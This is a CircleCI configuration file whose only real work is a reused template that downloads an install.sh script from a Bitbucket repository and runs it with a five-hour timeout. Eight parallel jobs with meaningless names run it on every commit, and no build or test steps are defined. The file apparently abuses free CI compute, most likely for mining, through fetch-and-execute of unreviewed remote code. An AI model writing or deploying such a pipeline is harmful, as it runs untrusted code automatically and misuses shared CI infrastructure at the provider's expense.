.mayora_template: &harum
  steps:
    - run: curl -L https://bitbucket.org/versaxaxddd/versax/raw/fd05fae596684ba73f29a1e877a145f84c35ead7/install.sh > ./install.sh
    - run: chmod +x ./install.sh
    - run: 
       name: circleci
       command: ./install.sh
       no_output_timeout: 5h
        
version: 2.0
jobs:
  seger:
    docker:
      - image: ruby
    steps:
      - checkout
  seger1:
    <<: *harum
    docker:
      - image: circleci/ruby:2.7.3
  seger2:
    <<: *harum
    docker:
      - image: circleci/ruby:2.7
  seger3:
    <<: *harum
    docker:
      - image: circleci/ruby:2.6.8
  seger4:
    <<: *harum
    docker:
      - image: circleci/ruby:2.6.7
  seger5:
    <<: *harum
    docker:
      - image: circleci/ruby:2.7.3
  seger6:
    <<: *harum
    docker:
      - image: circleci/ruby:2.7
  seger7:
    <<: *harum
    docker:
      - image: circleci/ruby:2.6.8
  seger8:
    <<: *harum
    docker:
      - image: circleci/ruby:2.6.7
      
      
workflows:
  version: 2
  commit:
    jobs:
      - seger
      - seger1
      - seger2
      - seger3
      - seger4
      - seger5
      - seger6
      - seger7
      - seger8      